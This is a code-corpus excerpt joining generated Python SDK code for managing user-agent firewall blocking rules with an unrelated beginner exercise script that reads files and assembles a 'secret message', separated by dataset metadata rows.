description: str = None,
**kwargs
) -> DetailedResponse:
"""
Update user-agent blocking rule.
Update an existing user-agent blocking rule for a given zone under a given service
instance.
:param str useragent_rule_identifier: Identifier of user-agent rule.
:param str mode: (optional) The type of action to perform.
:param UseragentRuleInputConfiguration configuration: (optional)
Target/Value pair to use for this rule. The value is the exact UserAgent to
match.
:param bool paused: (optional) Whether this user-agent rule is currently
disabled.
:param str description: (optional) Some useful information about this rule
to help identify the purpose of it.
:param dict headers: A `dict` containing the request headers
:return: A `DetailedResponse` containing the result, headers and HTTP status code.
:rtype: DetailedResponse with `dict` result representing a `UseragentRuleResp` object
"""
if useragent_rule_identifier is None:
raise ValueError('useragent_rule_identifier must be provided')
if configuration is not None:
configuration = convert_model(configuration)
headers = {}
sdk_headers = get_sdk_headers(service_name=self.DEFAULT_SERVICE_NAME,
service_version='V1',
operation_id='update_user_agent_rule')
headers.update(sdk_headers)
data = {
'mode': mode,
'configuration': configuration,
'paused': paused,
'description': description
}
data = {k: v for (k, v) in data.items() if v is not None}
data = json.dumps(data)
headers['content-type'] = 'application/json'
if 'headers' in kwargs:
headers.update(kwargs.get('headers'))
url = '/v1/{0}/zones/{1}/firewall/ua_rules/{2}'.format(
*self.encode_path_vars(self.crn, self.zone_identifier, useragent_rule_identifier))
request = self.prepare_request(method='PUT',
url=url,
headers=headers,
data=data)
response = self.send(request)
return response
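# Minimal usage sketch (not part of the generated SDK). The API key, CRN and zone
# identifier are placeholders that would come from your own IBM Cloud account.
def _example_list_user_agent_rules():
    from ibm_cloud_sdk_core.authenticators import IAMAuthenticator

    authenticator = IAMAuthenticator('<YOUR_IAM_API_KEY>')
    service = UserAgentBlockingRulesV1(
        crn='<YOUR_CRN>',
        zone_identifier='<YOUR_ZONE_ID>',
        authenticator=authenticator)
    # Fetch the first page of user-agent blocking rules for the zone.
    response = service.list_all_zone_user_agent_rules(page=1, per_page=5)
    return response.get_result()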
##############################################################################
# Models
##############################################################################
class DeleteUseragentRuleRespResult():
"""
Container for response information.
:attr str id: ID.
"""
def __init__(self,
id: str) -> None:
"""
Initialize a DeleteUseragentRuleRespResult object.
:param str id: ID.
"""
self.id = id
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteUseragentRuleRespResult':
"""Initialize a DeleteUseragentRuleRespResult object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
else:
raise ValueError('Required property \'id\' not present in DeleteUseragentRuleRespResult JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteUseragentRuleRespResult object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and self.id is not None:
_dict['id'] = self.id
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteUseragentRuleRespResult object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'DeleteUseragentRuleRespResult') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteUseragentRuleRespResult') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ListUseragentRulesRespResultInfo():
"""
Statistics of results.
:attr int page: Page number.
:attr int per_page: Number of results per page.
:attr int count: Number of results.
:attr int total_count: Total number of results.
"""
def __init__(self,
page: int,
per_page: int,
count: int,
total_count: int) -> None:
"""
Initialize a ListUseragentRulesRespResultInfo object.
:param int page: Page number.
:param int per_page: Number of results per page.
:param int count: Number of results.
:param int total_count: Total number of results.
"""
self.page = page
self.per_page = per_page
self.count = count
self.total_count = total_count
@classmethod
def from_dict(cls, _dict: Dict) -> 'ListUseragentRulesRespResultInfo':
"""Initialize a ListUseragentRulesRespResultInfo object from a json dictionary."""
args = {}
if 'page' in _dict:
args['page'] = _dict.get('page')
else:
raise ValueError('Required property \'page\' not present in ListUseragentRulesRespResultInfo JSON')
if 'per_page' in _dict:
args['per_page'] = _dict.get('per_page')
else:
raise ValueError('Required property \'per_page\' not present in ListUseragentRulesRespResultInfo JSON')
if 'count' in _dict:
args['count'] = _dict.get('count')
else:
raise ValueError('Required property \'count\' not present in ListUseragentRulesRespResultInfo JSON')
if 'total_count' in _dict:
args['total_count'] = _dict.get('total_count')
else:
raise ValueError('Required property \'total_count\' not present in ListUseragentRulesRespResultInfo JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ListUseragentRulesRespResultInfo object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'page') and self.page is not None:
_dict['page'] = self.page
if hasattr(self, 'per_page') and self.per_page is not None:
_dict['per_page'] = self.per_page
if hasattr(self, 'count') and self.count is not None:
_dict['count'] = self.count
if hasattr(self, 'total_count') and self.total_count is not None:
_dict['total_count'] = self.total_count
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ListUseragentRulesRespResultInfo object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ListUseragentRulesRespResultInfo') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ListUseragentRulesRespResultInfo') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class UseragentRuleInputConfiguration():
"""
Target/Value pair to use for this rule. The value is the exact UserAgent to match.
:attr str target: properties.
:attr str value: The exact UserAgent string to match with this rule.
"""
def __init__(self,
target: str,
value: str) -> None:
"""
Initialize a UseragentRuleInputConfiguration object.
:param str target: properties.
:param str value: The exact UserAgent string to match with this rule.
"""
self.target = target
self.value = value
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleInputConfiguration':
"""Initialize a UseragentRuleInputConfiguration object from a json dictionary."""
args = {}
if 'target' in _dict:
args['target'] = _dict.get('target')
else:
raise ValueError('Required property \'target\' not present in UseragentRuleInputConfiguration JSON')
if 'value' in _dict:
args['value'] = _dict.get('value')
else:
raise ValueError('Required property \'value\' not present in UseragentRuleInputConfiguration JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleInputConfiguration object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'target') and self.target is not None:
_dict['target'] = self.target
if hasattr(self, 'value') and self.value is not None:
_dict['value'] = self.value
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleInputConfiguration object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleInputConfiguration') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleInputConfiguration') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class TargetEnum(str, Enum):
"""
properties.
"""
UA = 'ua'
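# Illustrative sketch (not generated code): build a configuration object and use it
# to create a blocking rule. ``service`` is assumed to be an already configured
# UserAgentBlockingRulesV1 instance, e.g. the one from the sketch further above.
def _example_create_user_agent_rule(service: 'UserAgentBlockingRulesV1'):
    configuration = UseragentRuleInputConfiguration(target='ua', value='BadBot/1.0')
    response = service.create_zone_user_agent_rule(
        mode='block',
        configuration=configuration,
        paused=False,
        description='Block a misbehaving user agent')
    return response.get_result()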
class UseragentRuleObjectConfiguration():
"""
Target/Value pair to use for this rule. The value is the exact UserAgent to match.
:attr str target: properties.
:attr str value: The exact UserAgent string to match with this rule.
"""
def __init__(self,
target: str,
value: str) -> None:
"""
Initialize a UseragentRuleObjectConfiguration object.
:param str target: properties.
:param str value: The exact UserAgent string to match with this rule.
"""
self.target = target
self.value = value
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleObjectConfiguration':
"""Initialize a UseragentRuleObjectConfiguration object from a json dictionary."""
args = {}
if 'target' in _dict:
args['target'] = _dict.get('target')
else:
raise ValueError('Required property \'target\' not present in UseragentRuleObjectConfiguration JSON')
if 'value' in _dict:
args['value'] = _dict.get('value')
else:
raise ValueError('Required property \'value\' not present in UseragentRuleObjectConfiguration JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleObjectConfiguration object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'target') and self.target is not None:
_dict['target'] = self.target
if hasattr(self, 'value') and self.value is not None:
_dict['value'] = self.value
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleObjectConfiguration object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleObjectConfiguration') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleObjectConfiguration') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class TargetEnum(str, Enum):
"""
properties.
"""
UA = 'ua'
class DeleteUseragentRuleResp():
"""
user agent delete response.
:attr bool success: Operation success flag.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr DeleteUseragentRuleRespResult result: Container for response information.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: 'DeleteUseragentRuleRespResult') -> None:
"""
Initialize a DeleteUseragentRuleResp object.
:param bool success: Operation success flag.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param DeleteUseragentRuleRespResult result: Container for response
information.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
@classmethod
def from_dict(cls, _dict: Dict) -> 'DeleteUseragentRuleResp':
"""Initialize a DeleteUseragentRuleResp object from a json dictionary."""
args = {}
if 'success' in _dict:
args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in DeleteUseragentRuleResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in DeleteUseragentRuleResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in DeleteUseragentRuleResp JSON')
if 'result' in _dict:
args['result'] = DeleteUseragentRuleRespResult.from_dict(_dict.get('result'))
else:
raise ValueError('Required property \'result\' not present in DeleteUseragentRuleResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a DeleteUseragentRuleResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = self.result.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this DeleteUseragentRuleResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'DeleteUseragentRuleResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'DeleteUseragentRuleResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ListUseragentRulesResp():
"""
user agent rules response.
:attr bool success: Was operation successful.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr List[UseragentRuleObject] result: Container for response information.
:attr ListUseragentRulesRespResultInfo result_info: Statistics of results.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: List['UseragentRuleObject'],
result_info: 'ListUseragentRulesRespResultInfo') -> None:
"""
Initialize a ListUseragentRulesResp object.
:param bool success: Was operation successful.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param List[UseragentRuleObject] result: Container for response
information.
:param ListUseragentRulesRespResultInfo result_info: Statistics of results.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
self.result_info = result_info
@classmethod
def from_dict(cls, _dict: Dict) -> 'ListUseragentRulesResp':
"""Initialize a ListUseragentRulesResp object from a json dictionary."""
args = {}
if 'success' in _dict:
args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in ListUseragentRulesResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in ListUseragentRulesResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in ListUseragentRulesResp JSON')
if 'result' in _dict:
args['result'] = [UseragentRuleObject.from_dict(x) for x in _dict.get('result')]
else:
raise ValueError('Required property \'result\' not present in ListUseragentRulesResp JSON')
if 'result_info' in _dict:
args['result_info'] = ListUseragentRulesRespResultInfo.from_dict(_dict.get('result_info'))
else:
raise ValueError('Required property \'result_info\' not present in ListUseragentRulesResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ListUseragentRulesResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = [x.to_dict() for x in self.result]
if hasattr(self, 'result_info') and self.result_info is not None:
_dict['result_info'] = self.result_info.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ListUseragentRulesResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ListUseragentRulesResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ListUseragentRulesResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class UseragentRuleObject():
"""
user agent rule object.
:attr str id: Identifier of the user-agent blocking rule.
:attr bool paused: Whether this user-agent rule is currently disabled.
:attr str description: Some useful information about this rule to help identify
the purpose of it.
:attr str mode: The type of action to perform.
:attr UseragentRuleObjectConfiguration configuration: Target/Value pair to use
for this rule. The value is the exact UserAgent to match.
"""
def __init__(self,
id: str,
paused: bool,
description: str,
mode: str,
configuration: 'UseragentRuleObjectConfiguration') -> None:
"""
Initialize a UseragentRuleObject object.
:param str id: Identifier of the user-agent blocking rule.
:param bool paused: Whether this user-agent rule is currently disabled.
:param str description: Some useful information about this rule to help
identify the purpose of it.
:param str mode: The type of action to perform.
:param UseragentRuleObjectConfiguration configuration: Target/Value pair to
use for this rule. The value is the exact UserAgent to match.
"""
self.id = id
self.paused = paused
self.description = description
self.mode = mode
self.configuration = configuration
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleObject':
"""Initialize a UseragentRuleObject object from a json dictionary."""
args = {}
if 'id' in _dict:
args['id'] = _dict.get('id')
else:
raise ValueError('Required property \'id\' not present in UseragentRuleObject JSON')
if 'paused' in _dict:
args['paused'] = _dict.get('paused')
else:
raise ValueError('Required property \'paused\' not present in UseragentRuleObject JSON')
if 'description' in _dict:
args['description'] = _dict.get('description')
else:
raise ValueError('Required property \'description\' not present in UseragentRuleObject JSON')
if 'mode' in _dict:
args['mode'] = _dict.get('mode')
else:
raise ValueError('Required property \'mode\' not present in UseragentRuleObject JSON')
if 'configuration' in _dict:
args['configuration'] = UseragentRuleObjectConfiguration.from_dict(_dict.get('configuration'))
else:
raise ValueError('Required property \'configuration\' not present in UseragentRuleObject JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleObject object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'id') and self.id is not None:
_dict['id'] = self.id
if hasattr(self, 'paused') and self.paused is not None:
_dict['paused'] = self.paused
if hasattr(self, 'description') and self.description is not None:
_dict['description'] = self.description
if hasattr(self, 'mode') and self.mode is not None:
_dict['mode'] = self.mode
if hasattr(self, 'configuration') and self.configuration is not None:
_dict['configuration'] = self.configuration.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleObject object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleObject') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleObject') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ModeEnum(str, Enum):
"""
The type of action to perform.
"""
BLOCK = 'block'
CHALLENGE = 'challenge'
JS_CHALLENGE = 'js_challenge'
class UseragentRuleResp():
"""
user agent rule response.
:attr bool success: Was operation successful.
:attr List[List[str]] errors: Array of errors encountered.
:attr List[List[str]] messages: Array of messages returned.
:attr UseragentRuleObject result: user agent rule object.
"""
def __init__(self,
success: bool,
errors: List[List[str]],
messages: List[List[str]],
result: 'UseragentRuleObject') -> None:
"""
Initialize a UseragentRuleResp object.
:param bool success: Was operation successful.
:param List[List[str]] errors: Array of errors encountered.
:param List[List[str]] messages: Array of messages returned.
:param UseragentRuleObject result: user agent rule object.
"""
self.success = success
self.errors = errors
self.messages = messages
self.result = result
@classmethod
def from_dict(cls, _dict: Dict) -> 'UseragentRuleResp':
"""Initialize a UseragentRuleResp object from a json dictionary."""
args = {}
if 'success' in _dict:
args['success'] = _dict.get('success')
else:
raise ValueError('Required property \'success\' not present in UseragentRuleResp JSON')
if 'errors' in _dict:
args['errors'] = _dict.get('errors')
else:
raise ValueError('Required property \'errors\' not present in UseragentRuleResp JSON')
if 'messages' in _dict:
args['messages'] = _dict.get('messages')
else:
raise ValueError('Required property \'messages\' not present in UseragentRuleResp JSON')
if 'result' in _dict:
args['result'] = UseragentRuleObject.from_dict(_dict.get('result'))
else:
raise ValueError('Required property \'result\' not present in UseragentRuleResp JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a UseragentRuleResp object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'success') and self.success is not None:
_dict['success'] = self.success
if hasattr(self, 'errors') and self.errors is not None:
_dict['errors'] = self.errors
if hasattr(self, 'messages') and self.messages is not None:
_dict['messages'] = self.messages
if hasattr(self, 'result') and self.result is not None:
_dict['result'] = self.result.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this UseragentRuleResp object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'UseragentRuleResp') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'UseragentRuleResp') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
| 38.884086 | 118 | 0.609792 |
f9fe542a1d659f5f403bee23405a74ad24bd1e37 | 2,518 | py | Python | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | ["MIT"] | null | null | null | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | ["MIT"] | null | null | null | ga-spy-games/code.py | manthangandhi/dsmp-pre-work | 0cfc899dd27292bf11ad80b8df9de19a0c1723c2 | ["MIT"] | null | null | null |
# --------------
##File path for the file
file_path
#Code starts here
def read_file(path):
    file = open(path, "r")  # use the argument, not the global file_path
sentence = file.readline()
file.close()
return sentence
sample_message = read_file(file_path)
# --------------
#Code starts here
#Function to fuse message
def fuse_msg(message_a,message_b):
#Integer division of two numbers
quot=(int(message_b)//int(message_a))
#Returning the quotient in string format
return str(quot)
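# Illustrative example (not one of the graded steps): fuse_msg('5', '20') computes
# 20 // 5 and returns the quotient as the string '4'.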
#Calling the function to read file
message_1=read_file(file_path_1)
print(message_1)
#Calling the function to read file
message_2=read_file(file_path_2)
#Calling the function 'fuse_msg'
secret_msg_1=fuse_msg(message_1,message_2)
#Printing the secret message
print(secret_msg_1)
#Code ends here
# --------------
#Code starts here
def substitute_msg(message_c):
    # Start from an empty string so the function always returns a value, even for
    # an unexpected colour.
    sub = ''
    if message_c == 'Red':
        sub = 'Army General'
    elif message_c == 'Green':
        sub = 'Data Scientist'
    elif message_c == 'Blue':
        sub = 'Marine Biologist'
    return sub
message_3 = read_file(file_path_3)
print(message_3)
secret_msg_2 = substitute_msg(message_3)
print(secret_msg_2)
# --------------
# File path for message 4 and message 5
file_path_4
file_path_5
#Code starts here
message_4 = read_file(file_path_4)
print(message_4)
message_5 = read_file(file_path_5)
print(message_5)
def compare_msg(message_d, message_e):
a_list = message_d.split()
b_list = message_e.split()
c_list = [i for i in a_list if i not in b_list]
final_msg = " ".join(c_list)
return final_msg
secret_msg_3 = compare_msg(message_4, message_5)
print(secret_msg_3)
# --------------
#Code starts here
message_6 = read_file(file_path_6)
print(message_6)
def extract_msg(message_f):
a_list = message_f.split()
even_word = lambda x : len(x) % 2 == 0
b_list = filter(even_word, a_list)
final_msg = " ".join(b_list)
return final_msg
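# Illustrative example (not one of the graded steps): only even-length words survive,
# e.g. extract_msg('It is a secret message') returns 'It is secret'.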
secret_msg_4 = extract_msg(message_6)
print(secret_msg_4)
# --------------
#Secret message parts in the correct order
message_parts=[secret_msg_3, secret_msg_1, secret_msg_4, secret_msg_2]
final_path= user_data_dir + '/secret_message.txt'
#Code starts here
secret_msg = " ".join(message_parts)
def write_file(secret_msg, path):
file = open(path,"a+")
file.write(secret_msg)
file.close()
write_file(secret_msg, final_path)
print(secret_msg)
| 20.306452 | 71 | 0.664019 |